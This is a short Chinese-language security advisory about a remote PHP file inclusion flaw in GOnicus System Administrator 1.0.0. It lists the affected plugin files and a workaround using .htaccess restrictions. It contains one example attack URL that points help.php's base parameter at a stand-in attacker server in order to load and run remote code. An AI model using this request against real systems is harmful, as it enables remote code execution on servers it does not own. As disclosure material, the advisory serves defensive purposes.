涉及程序:
GOnicus System Administrator 1.0.0版
描述:
GOnicus System Administrator 存在PHP注入缺陷
详细:
GOnicus System Administrator是一款PHP管理工具,用于管理LDAP数据库的帐户和系统。远程攻击者能在GOnicus System Administrator中注入任意PHP代码,通过更改几个变量,攻击者能在WEB服务器上执行任意代码。
通过在下列文档中设置plugin变量,攻击者能包含并执行远程文件:
plugins/3fax/1blocklists/index.php
plugins/2administration/6departamentadmin/index.php
plugins/2administration/5terminals/index.php
plugins/2administration/4mailinglists/index.php
plugins/2administration/3departaments/index.php
plugins/2administration/2groupd/index.php
include/help.php文件也存在同样问题。攻击者提供恶意URL,导致用户从攻击者服务器上装载包含恶意代码的include/common.inc文件,并以WEB权限执行文件中包含的恶意代码。
攻击方法:
示例代码:
http://target.server/include/help.php?base=http://attackers.server/
网管下载dl.bitscn.com
解决方案:
目前厂商未公布该缺陷补丁,请用户及时关注厂商站点:
http://www.gonicus.de
临时解决方案:
对所有包含.php文件的子目录通过.htaccess进行访问限制。
附加信息:
无
评论加载中…
